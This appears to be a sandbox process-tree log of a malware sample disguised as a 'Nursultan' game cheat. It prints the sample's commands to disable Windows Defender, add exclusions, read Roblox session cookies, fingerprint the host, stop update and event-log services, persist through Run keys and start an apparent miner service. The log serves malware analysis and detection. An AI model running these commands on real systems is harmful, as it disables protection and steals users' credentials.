        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        9⤵
        Executes dropped EXE
        
        PID:1640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        9⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        9⤵
        Executes dropped EXE
        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        9⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        9⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:444
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        9⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        10⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        10⤵
        Executes dropped EXE
        
        PID:824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2932
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        11⤵
        Views/modifies file attributes
        
        PID:980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        
        PID:1056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:2780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        
        PID:2548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:1728
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        
        PID:936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:2976
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        11⤵
        
        PID:2560
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        Runs ping.exe
        
        PID:2424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        10⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3020
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        10⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        11⤵
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        11⤵
        Executes dropped EXE
        
        PID:1072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        11⤵
        Executes dropped EXE
        
        PID:1216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        11⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        11⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        12⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        11⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:544
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        12⤵
        Executes dropped EXE
        
        PID:2404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        12⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        12⤵
        Executes dropped EXE
        
        PID:1912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        12⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        12⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2152
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        13⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        12⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        13⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        13⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2456
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        14⤵
        Drops file in System32 directory
        
        PID:2300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        14⤵
        
        PID:2780
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        15⤵
        Drops file in Windows directory
        
        PID:2464
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        14⤵
        Launches sc.exe
        
        PID:1036
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        14⤵
        Launches sc.exe
        
        PID:2252
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        14⤵
        Launches sc.exe
        
        PID:2132
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        14⤵
        Launches sc.exe
        
        PID:2008
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        14⤵
        
        PID:308
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        14⤵
        Power Settings
        
        PID:2808
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        14⤵
        Power Settings
        
        PID:692
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        14⤵
        Power Settings
        
        PID:2584
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        14⤵
        Power Settings
        
        PID:2068
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        14⤵
        Launches sc.exe
        
        PID:2528
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        14⤵
        Launches sc.exe
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        13⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        13⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2024
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        14⤵
        Views/modifies file attributes
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        14⤵
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        14⤵
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        
        PID:1844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        14⤵
        
        PID:1684
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        14⤵
        
        PID:536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        14⤵
        
        PID:1188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        14⤵
        Detects videocard installed
        
        PID:1640
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        14⤵
        
        PID:1496
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        15⤵
        Runs ping.exe
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        13⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        13⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        14⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        13⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        14⤵
        Executes dropped EXE
        
        PID:1496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        14⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        14⤵
        Executes dropped EXE
        
        PID:2916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        14⤵
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        14⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2880
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        15⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        14⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        15⤵
        Executes dropped EXE
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        15⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        15⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2744
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        16⤵
        Views/modifies file attributes
        
        PID:2688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        16⤵
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        16⤵
        
        PID:2352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:2232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:1144
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        16⤵
        
        PID:1036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        16⤵
        
        PID:2968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:2400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        16⤵
        
        PID:1488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        16⤵
        Detects videocard installed
        
        PID:824
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        16⤵
        
        PID:1276
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        17⤵
        Runs ping.exe
        
        PID:1928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        15⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        15⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1748
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        16⤵
        
        PID:1244
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        15⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        16⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        16⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        16⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        16⤵
        Executes dropped EXE
        
        PID:876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        16⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        16⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2912
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        17⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        16⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        17⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        17⤵
        
        PID:1960
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        17⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2748
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        18⤵
        Views/modifies file attributes
        
        PID:976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        18⤵
        
        PID:1144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        18⤵
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        18⤵
        
        PID:676
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        18⤵
        
        PID:872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        18⤵
        
        PID:612
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        18⤵
        
        PID:1620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        18⤵
        
        PID:2596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        18⤵
        Detects videocard installed
        
        PID:1972
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        18⤵
        
        PID:2324
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        19⤵
        Runs ping.exe
        
        PID:1744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        17⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2712
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        18⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        17⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
